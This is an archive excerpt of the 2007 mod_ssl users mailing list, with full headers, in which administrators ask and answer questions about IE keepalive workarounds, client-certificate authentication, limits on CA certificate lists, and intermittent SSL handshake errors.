	id 56A8F14D86E; Wed, 16 May 2007 18:28:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hq-ipt01.anteon.com (hq-ipt01.anteon.com [198.185.182.20])
	by master.modssl.org (Postfix) with ESMTP id E9EE414D82C
	for ; Wed, 16 May 2007 18:28:53 +0200 (CEST)
Received: from hq-exout01.anteon.com ([10.170.1.216])
  by hq-ipt01.anteon.com with ESMTP; 16 May 2007 12:28:08 -0400
X-SENDER-IP: 10.170.1.216
X-SENDER-REPUTATION: None
X-IronPort-AV: i="4.14,544,1170651600"; 
   d="scan'208,217"; a="29755100:sNHT109877159"
Received: from HQ-EXVS02.anteon.com ([10.170.1.143]) by HQ-EXOUT01.anteon.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Wed, 16 May 2007 12:28:08 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C797D7.301DC11F"
Subject: nokeepalive and SSLVerifyClient
Date: Wed, 16 May 2007 12:28:06 -0400
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: nokeepalive and SSLVerifyClient
Thread-Index: AceX1y8//vhuBcyPSICSCLr3B+90lQ==
From: "Fought, Richard" 
To: 
X-OriginalArrivalTime: 16 May 2007 16:28:08.0253 (UTC) FILETIME=[3001B6D0:01C797D7]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Fought, Richard" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C797D7.301DC11F
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable

I've been searching through the mailing list to find an answer to this
question, but haven't run across it yet.

=20

We currently use the=20

=20


------_=_NextPart_001_01C797D7.301DC11F
Content-Type: text/html;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
















I’ve been searching through the mailing list to =
find
an answer to this question, but haven’t run across it =
yet.



 



We currently use the 



 









------_=_NextPart_001_01C797D7.301DC11F--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 16 18:33:22 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B9E7714D86E; Wed, 16 May 2007 18:33:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mower.iserver.net (mower.iserver.net [128.121.79.16])
	by master.modssl.org (Postfix) with ESMTP id C0EB314D82C
	for ; Wed, 16 May 2007 18:33:20 +0200 (CEST)
Received: from gromit.corp.verio.net (fw.oremut02.us.wh.verio.net [198.65.168.24])
	(authenticated bits=0)
	by mower.iserver.net (8.13.6.20060614/8.13.6) with ESMTP id l4GGWYat034849
	for ; Wed, 16 May 2007 10:32:34 -0600 (MDT)
Message-ID: <464B321D.3000700@allez-oop.net>
Date: Wed, 16 May 2007 10:32:29 -0600
From: "Omar W. Hannet" 
User-Agent: Thunderbird 2.0.0.0 (X11/20070514)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: nokeepalive and SSLVerifyClient
References: 
In-Reply-To: 
Content-Type: text/plain; charset=windows-1252; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Omar W. Hannet" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Fought, Richard wrote:
> I’ve been searching through the mailing list to find an answer to this 
> question, but haven’t run across it yet.
> 
>  
> 
> We currently use the

The answer to your question is



;-)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 16 18:35:47 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3CC6A14D885; Wed, 16 May 2007 18:35:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hq-ipt01.anteon.com (hq-ipt01.anteon.com [198.185.182.20])
	by master.modssl.org (Postfix) with ESMTP id CDB9114D867
	for ; Wed, 16 May 2007 18:35:46 +0200 (CEST)
Received: from hq-exout01.anteon.com ([10.170.1.216])
  by hq-ipt01.anteon.com with ESMTP; 16 May 2007 12:35:00 -0400
X-SENDER-IP: 10.170.1.216
X-SENDER-REPUTATION: None
X-IronPort-AV: i="4.14,544,1170651600"; 
   d="scan'208,217"; a="29755945:sNHT280679462"
Received: from HQ-EXVS02.anteon.com ([10.170.1.143]) by HQ-EXOUT01.anteon.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Wed, 16 May 2007 12:35:00 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C797D8.25FF0BDA"
Subject: nokeepalive and SSLVerifyClient
Date: Wed, 16 May 2007 12:34:59 -0400
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: nokeepalive and SSLVerifyClient
Thread-Index: AceX2CUJHYBaYr5ATGSGBoZDmbV4/g==
From: "Fought, Richard" 
To: 
X-OriginalArrivalTime: 16 May 2007 16:35:00.0787 (UTC) FILETIME=[25E56830:01C797D8]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Fought, Richard" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C797D8.25FF0BDA
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable

Sorry, I sent the last message prematurely (damn hotkeys).
=20
We currently use the following options to get around the IE SSL bug:
=20
SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

=20

We also wish to use X509 client authentication, and my concern is that
these directives will cause the client certification verification, and
indeed the entire SSL session negotiation, to be performed anew with
every single request.  Is this performance hit a reality?

=20

Thanks,

Rich


------_=_NextPart_001_01C797D8.25FF0BDA
Content-Type: text/html;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable













Sorry, I sent the last message prematurely =
(damn hotkeys).
 
We currently use the =
following options to get around the IE SSL =
bug:
 
SetEnvIf =
User-Agent ".*MSIE.*" =
\
       &nbs=
p; nokeepalive ssl-unclean-shutdown =
\
       &nbs=
p; downgrade-1.0 force-response-1.0



 



We also wish to use X509 client authentication, and =
my
concern is that these directives will cause the client certification
verification, and indeed the entire SSL session negotiation, to be =
performed anew
with every single request.  Is this performance hit a =
reality?



 



Thanks,



Rich









------_=_NextPart_001_01C797D8.25FF0BDA--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 17 16:35:57 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 314CF14D86B; Thu, 17 May 2007 16:35:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bay0-omc3-s23.bay0.hotmail.com (bay0-omc3-s23.bay0.hotmail.com [65.54.246.223])
	by master.modssl.org (Postfix) with ESMTP id 9227214D852
	for ; Thu, 17 May 2007 16:35:56 +0200 (CEST)
Received: from hotmail.com ([65.54.224.16]) by bay0-omc3-s23.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.2668);
	 Thu, 17 May 2007 07:35:10 -0700
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 17 May 2007 07:35:10 -0700
Message-ID: 
Received: from 65.54.224.200 by by105fd.bay105.hotmail.msn.com with HTTP;
	Thu, 17 May 2007 14:35:09 GMT
X-Originating-IP: [84.61.161.202]
X-Originating-Email: [kellerkind79@hotmail.de]
X-Sender: kellerkind79@hotmail.de
From: "Keller Kind" 
To: modssl-users@modssl.org
Subject: Problems with CA-Certifcates
Date: Thu, 17 May 2007 16:35:09 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
X-OriginalArrivalTime: 17 May 2007 14:35:10.0308 (UTC) FILETIME=[92732240:01C79890]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Keller Kind" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,
i have got 2 problems with my Apache using mod_ssl and authentification
with client-certificates.

1. When the Apache is running and i copy a new pem-encoded
CA-Certificate in the specified directory (SSLCACertifcatePath) and
create the symbolic hash-link, no client is able to connect with the
website with his Client-Certificate issued by the copied CA until i
restart the Server. Is this a Bug? Or is there any way to actualise the
CA-Certificates without a restart?

2. The Number of CA-Certificates seems to be limited at ~250. When i use
too many CA-Certificates in the Directory (SSLCACertifcatePath) the
SSL-Message from the Server to the Client is malformed and no Client can
connect. Is this also a Bug?

Dont ask me, why i need more than 250 CA-Certificates. Its for a
Masterthesis.

_________________________________________________________________
Haben Spinnen Ohren? Finden Sie es heraus – mit dem MSN Suche Superquiz via  
http://www.msn-superquiz.de  Jetzt mitmachen und gewinnen!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 17 16:45:19 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0740B14D88C; Thu, 17 May 2007 16:45:19 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hq-ipt01.anteon.com (hq-ipt01.anteon.com [198.185.182.20])
	by master.modssl.org (Postfix) with ESMTP id 824C714D863
	for ; Thu, 17 May 2007 16:45:17 +0200 (CEST)
Received: from hq-exout01.anteon.com ([10.170.1.216])
  by hq-ipt01.anteon.com with ESMTP; 17 May 2007 10:44:31 -0400
X-SENDER-IP: 10.170.1.216
X-SENDER-REPUTATION: None
X-IronPort-AV: i="4.14,549,1170651600"; 
   d="scan'208"; a="29881968:sNHT22093561"
Received: from HQ-EXVS02.anteon.com ([10.170.1.143]) by HQ-EXOUT01.anteon.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Thu, 17 May 2007 10:44:31 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Problems with CA-Certifcates
Date: Thu, 17 May 2007 10:44:31 -0400
Message-ID: 
In-Reply-To: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Problems with CA-Certifcates
Thread-Index: AceYkJ1XG4jkdwqUQiCHEtbZE641+wAADuRg
References: 
From: "Fought, Richard" 
To: 
X-OriginalArrivalTime: 17 May 2007 14:44:31.0912 (UTC) FILETIME=[E1311A80:01C79891]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Fought, Richard" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

1. I believe the server reads the CA cert into memory at startup for a
couple of reasons: to prevent unnecessary disk access, and probably as a
security measure as well.  If your cert is password protected, you might
want an admin to type it in and startup is the perfect time to do it.

2. Maybe it is a # of files limitation?  If I'm not mistaken, you can
have more than one certificate in a PEM file.  Maybe try to combine
them.

Rich
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 17 17:31:09 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B201D14D86B; Thu, 17 May 2007 17:31:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bay0-omc1-s37.bay0.hotmail.com (bay0-omc1-s37.bay0.hotmail.com [65.54.246.109])
	by master.modssl.org (Postfix) with ESMTP id F097314D852
	for ; Thu, 17 May 2007 17:31:04 +0200 (CEST)
Received: from hotmail.com ([65.54.224.39]) by bay0-omc1-s37.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.2668);
	 Thu, 17 May 2007 08:30:18 -0700
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 17 May 2007 08:30:18 -0700
Message-ID: 
Received: from 65.54.224.200 by by105fd.bay105.hotmail.msn.com with HTTP;
	Thu, 17 May 2007 15:30:16 GMT
X-Originating-IP: [84.61.161.202]
X-Originating-Email: [kellerkind79@hotmail.de]
X-Sender: kellerkind79@hotmail.de
From: "Keller Kind" 
To: modssl-users@modssl.org
Subject: Re: Problems with CA-Certifcates
Date: Thu, 17 May 2007 17:30:16 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
X-OriginalArrivalTime: 17 May 2007 15:30:18.0414 (UTC) FILETIME=[463C0CE0:01C79898]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Keller Kind" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

2. Yes i know, that i can have more than one certificate in a PEM-file.
That is used for the SSLCACertificateFile Option. But this didnt solve
the problem.
There is no difference between having more than 250 single certificate
files or one
file with 250 certificates.
In the SSL-Handshake the Server sends to the Client, which CAs he accepts.
This Massage seems to be malformed when there are too many CAs.
Any Ideas...?


Fought, Richard schrieb:
>1. I believe the server reads the CA cert into memory at startup for a
>couple of reasons: to prevent unnecessary disk access, and probably as a
>security measure as well.  If your cert is password protected, you might
>want an admin to type it in and startup is the perfect time to do it.
>
>2. Maybe it is a # of files limitation?  If I'm not mistaken, you can
>have more than one certificate in a PEM file.  Maybe try to combine
>them.
>
>Rich
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>
>
>

_________________________________________________________________
Sie suchen E-Mails, Dokumente oder Fotos? Die neue MSN Suche Toolbar mit 
Windows-Desktopsuche liefert in sekundenschnelle Ergebnisse. Jetzt neu! 
http://desktop.msn.de/ Jetzt gratis downloaden!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 17 20:57:05 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F27DC14D885; Thu, 17 May 2007 20:57:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hq-ipt01.anteon.com (hq-ipt01.anteon.com [198.185.182.20])
	by master.modssl.org (Postfix) with ESMTP id F2E7D14D852
	for ; Thu, 17 May 2007 20:57:03 +0200 (CEST)
Received: from hq-exout01.anteon.com ([10.170.1.216])
  by hq-ipt01.anteon.com with ESMTP; 17 May 2007 14:56:17 -0400
X-SENDER-IP: 10.170.1.216
X-SENDER-REPUTATION: None
X-IronPort-AV: i="4.14,549,1170651600"; 
   d="scan'208"; a="29917127:sNHT22007146"
Received: from HQ-EXVS02.anteon.com ([10.170.1.143]) by HQ-EXOUT01.anteon.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Thu, 17 May 2007 14:56:17 -0400
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Problems with CA-Certifcates
X-MimeOLE: Produced By Microsoft Exchange V6.5
Date: Thu, 17 May 2007 14:56:15 -0400
Message-ID: 
In-Reply-To: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Problems with CA-Certifcates
Thread-Index: AceYmFFpJEQfDqJgTVyuGrA7bwuuTwAGqbBw
References: 
From: "Fought, Richard" 
To: 
X-OriginalArrivalTime: 17 May 2007 18:56:17.0302 (UTC) FILETIME=[0CB4B360:01C798B5]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Fought, Richard" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Looking at the SSL 3.0 spec at
http://wp.netscape.com/eng/ssl3/draft302.txt, there appears to be a size
limit for the list of CA distinguished names ..

     struct {
         CertificateType certificate_types<1..2^8-1>;
         DistinguishedName certificate_authorities<3..2^16-1>;
     } CertificateRequest;

If I interpret the spec correctly, this means 3 - 65535 bytes of data
available for the list of DNs (someone please correct me if I am wrong).

Perhaps you are hitting this limit.

Rich


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Keller Kind
Sent: Thursday, May 17, 2007 10:30 AM
To: modssl-users@modssl.org
Subject: Re: Problems with CA-Certifcates

2. Yes i know, that i can have more than one certificate in a PEM-file.
That is used for the SSLCACertificateFile Option. But this didnt solve
the problem.
There is no difference between having more than 250 single certificate
files or one
file with 250 certificates.
In the SSL-Handshake the Server sends to the Client, which CAs he
accepts.
This Massage seems to be malformed when there are too many CAs.
Any Ideas...?


Fought, Richard schrieb:
>1. I believe the server reads the CA cert into memory at startup for a
>couple of reasons: to prevent unnecessary disk access, and probably as
a
>security measure as well.  If your cert is password protected, you
might
>want an admin to type it in and startup is the perfect time to do it.
>
>2. Maybe it is a # of files limitation?  If I'm not mistaken, you can
>have more than one certificate in a PEM file.  Maybe try to combine
>them.
>
>Rich
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>
>
>

_________________________________________________________________
Sie suchen E-Mails, Dokumente oder Fotos? Die neue MSN Suche Toolbar mit

Windows-Desktopsuche liefert in sekundenschnelle Ergebnisse. Jetzt neu!=20
http://desktop.msn.de/ Jetzt gratis downloaden!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 22 14:59:27 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id ABEDE14D887; Tue, 22 May 2007 14:59:27 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp-out-54.livemail.co.uk (smtp-out-54.livemail.co.uk [213.171.216.54])
	by master.modssl.org (Postfix) with ESMTP id 8BB0214D837
	for ; Tue, 22 May 2007 14:59:24 +0200 (CEST)
Received: from webmail01.livemail.co.uk (mail213-171-216-230.livemail.co.uk [213.171.216.230])
	by smtp-out-54.livemail.co.uk (Postfix) with SMTP id F3B1B1975A2
	for ; Tue, 22 May 2007 13:58:37 +0100 (BST)
MIME-Version: 1.0
X-Mailer: livemail.co.uk Webmail
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-ID: 
Date: Tue, 22 May 2007 13:58:37 +0100
From: donal.hanna@the-plot.com
To: modssl-users@modssl.org
Subject: re: client certificate authentication and IE friendly errors
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: donal.hanna@the-plot.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I'm having a problem with Internet Explorer's "Show friendly HTTP error
messages" in response to a 403 generated by an SSLRequire directive, when
trying client certificate authentication. 

I've come across some information about over-riding the browser config by
setting the size of the message [greater than 512 bytes for a 403], which
doesn't appear to work. Unfortunately I can't rely on users having unchecked
this setting in the browser options.

The config directives that I'm using are an SSLRequire %{SSL_CLIENT_VERIFY} eq
"SUCCESS" in conjunction with an SSLVerifyClient Optional, both within the
same Location directive. I've combined these because there is a likelihood
that the resource will be accessed by clients without certificates, and I'm
trying to trap this in as friendly a way as possible.

Everything works fine in my testing [good cert, no cert, wrong cert], except
when I try to hit the server with an expired client certificate in IE. Because
of some testing constraints around where I get the certificates from I've been
simulating expiry by adjusting the time on both the desktop and server - just
the client cert is expired at the chosen time; not the issuing CA cert or web
server's.

With an expired client certificate, my ErrorDocument 403 is correctly
displayed if the 'show friendly messages' is unchecked, but the browser shows
a 'page cannot be displayed' error if the setting is enabled. I can't see
anything in the logs to distinguish the two states. A reload on the browser
correctly renders the error.

Is this something that anyone else has come across? I've checked the archives,
and although people have cited problems with friendly errors
[http://marc.info/?l=apache-modssl&m=101554001204754&w=2] the circumstances
seem different.

Is there a saner way of handling the access attempts from browsers attempting
to access the same resource both with and without client certs?

Version info:
- desktop: XP SP2, IE version 6.0.29...
- server: Suse Linux 10.1; Apache 1.3.37; mod_ssl 2.8.28-1.3.33; openssl
0.9.8e

I have the SetEnvIf HTTP_USER_AGENT ".*MSIE.*" ... enabled as per default
config. SSLCACertificateFile has a single entry for the issuing CA.

Thanks,

Donal




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 31 16:03:24 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 083D714D86B; Thu, 31 May 2007 16:03:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from www.kegworks.com (web.dotcomholdingsofbuffalo.com [69.20.124.142])
	by master.modssl.org (Postfix) with SMTP id 33DAF14D836
	for ; Thu, 31 May 2007 16:03:23 +0200 (CEST)
Received: (qmail 30938 invoked by uid 541); 31 May 2007 14:02:34 -0000
Received: from 63.131.28.2 by web.dotcomholdingsofbuffalo.com (envelope-from , uid 507) with qmail-scanner-1.25st 
 (clamdscan: 0.85.1/3333. spamassassin: 2.64. perlscan: 1.25st.  
 Clear:RC:1(63.131.28.2):. 
 Processed in 0.141753 secs); 31 May 2007 14:02:34 -0000
Received: from static-63-131-28-2.buf.onecommunications.net (HELO ?192.168.1.6?) (63.131.28.2)
  by www.kegworks.com with SMTP; 31 May 2007 14:02:34 -0000
Message-ID: <465ED579.6010707@kegworks.com>
Date: Thu, 31 May 2007 10:02:33 -0400
From: John Nichel 
User-Agent: Thunderbird 2.0.0.0 (X11/20070326)
MIME-Version: 1.0
To: mod_ssl List 
Subject: Random SSL Problems
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John Nichel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi List,

   I having an issue here on a newly setup webserver that I'm hoping you
can help me with.  For some reason, when some of our customers click to
go into the secure area of our site, they're getting the Plain Jane IE
error page of "Page cannot be displayed".  When this happens, I get an
error like this in the error log:

> [Thu May 31 09:29:10 2007] [error] mod_ssl: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!] (System error follows)
> [Thu May 31 09:29:10 2007] [error] System: Connection reset by peer (errno: 104)

I found this error in numerous results doing Google searches, but none
of them seem to be relevant to my issue.  There doesn't seem to be any
rhyme or reason as to who or why.  We've had customers call after they
experience the issue who were using browsers like IE 6 and IE 7, but
we've also had success with other customers using those same browsers (I
cannot reproduce the problem locally).  I cannot be sure of the exact
percentage of errors, but looking at our order volume, it seems to be
happening about 40% of the time.

The install is configured and compiled from source on a RHEL4 box:

Apache 1.3.37
mod_ssl 2.8.28
OpenSSL 0.9.8e

And these modules are loaded into Apache:

mod_pythonmod_perl, mod_php4, mod_ssl, mod_setenvif, mod_so,
mod_unique_id, mod_log_forensic, mod_usertrack, mod_headers,
mod_expires, mod_cern_meta, mod_proxy, mod_digest, mod_auth_dbm,
mod_auth_anon, mod_auth, mod_access, mod_rewrite, mod_alias,
mod_userdir, mod_speling, mod_actions, mod_imap, mod_asis, mod_cgi,
mod_dir, mod_autoindex, mod_include, mod_info, mod_status,
mod_negotiation, mod_mime, mod_mime_magic, mod_log_config, mod_define,
mod_env, mod_vhost_alias, http_core

Any help would be greatly appreciated.

-- 
John C. Nichel IV
System Administrator
KegWorks
http://www.kegworks.com
716.362.9212 x16
john@kegworks.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 31 16:34:23 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 723E714D86B; Thu, 31 May 2007 16:34:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hq-ipt01.anteon.com (hq-ipt01.anteon.com [198.185.182.20])
	by master.modssl.org (Postfix) with ESMTP id 92C6F14D836
	for ; Thu, 31 May 2007 16:34:21 +0200 (CEST)
Received: from hq-exout01.anteon.com ([10.170.1.216])
  by hq-ipt01.anteon.com with ESMTP; 31 May 2007 10:33:32 -0400
X-SENDER-IP: 10.170.1.216
X-SENDER-REPUTATION: None
X-IronPort-AV: i="4.14,599,1170651600"; 
   d="scan'208"; a="31634971:sNHT23006088"
Received: from HQ-EXVS02.anteon.com ([10.170.1.143]) by HQ-EXOUT01.anteon.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Thu, 31 May 2007 10:33:32 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Random SSL Problems
Date: Thu, 31 May 2007 10:33:32 -0400
Message-ID: 
In-Reply-To: <465ED579.6010707@kegworks.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Random SSL Problems
Thread-Index: AcejjGS7UxqqS4rWTB6ikSMA82MXqAAA3zWg
References: <465ED579.6010707@kegworks.com>
From: "Fought, Richard" 
To: 
X-OriginalArrivalTime: 31 May 2007 14:33:32.0741 (UTC) FILETIME=[AA141750:01C7A390]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Fought, Richard" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

There seems to be a bug in IE that affects how it interacts with
mod_ssl.  See:

http://httpd.apache.org/docs/2.0/ssl/ssl_faq.html#msie

for some tips.

Rich

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of John Nichel
Sent: Thursday, May 31, 2007 9:03 AM
To: mod_ssl List
Subject: Random SSL Problems

Hi List,

   I having an issue here on a newly setup webserver that I'm hoping you
can help me with.  For some reason, when some of our customers click to
go into the secure area of our site, they're getting the Plain Jane IE
error page of "Page cannot be displayed".  When this happens, I get an
error like this in the error log:

> [Thu May 31 09:29:10 2007] [error] mod_ssl: SSL handshake interrupted
by system [Hint: Stop button pressed in browser?!] (System error
follows)
> [Thu May 31 09:29:10 2007] [error] System: Connection reset by peer
(errno: 104)

I found this error in numerous results doing Google searches, but none
of them seem to be relevant to my issue.  There doesn't seem to be any
rhyme or reason as to who or why.  We've had customers call after they
experience the issue who were using browsers like IE 6 and IE 7, but
we've also had success with other customers using those same browsers (I
cannot reproduce the problem locally).  I cannot be sure of the exact
percentage of errors, but looking at our order volume, it seems to be
happening about 40% of the time.

The install is configured and compiled from source on a RHEL4 box:

Apache 1.3.37
mod_ssl 2.8.28
OpenSSL 0.9.8e

And these modules are loaded into Apache:

mod_pythonmod_perl, mod_php4, mod_ssl, mod_setenvif, mod_so,
mod_unique_id, mod_log_forensic, mod_usertrack, mod_headers,
mod_expires, mod_cern_meta, mod_proxy, mod_digest, mod_auth_dbm,
mod_auth_anon, mod_auth, mod_access, mod_rewrite, mod_alias,
mod_userdir, mod_speling, mod_actions, mod_imap, mod_asis, mod_cgi,
mod_dir, mod_autoindex, mod_include, mod_info, mod_status,
mod_negotiation, mod_mime, mod_mime_magic, mod_log_config, mod_define,
mod_env, mod_vhost_alias, http_core

Any help would be greatly appreciated.

--=20
John C. Nichel IV
System Administrator
KegWorks
http://www.kegworks.com
716.362.9212 x16
john@kegworks.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
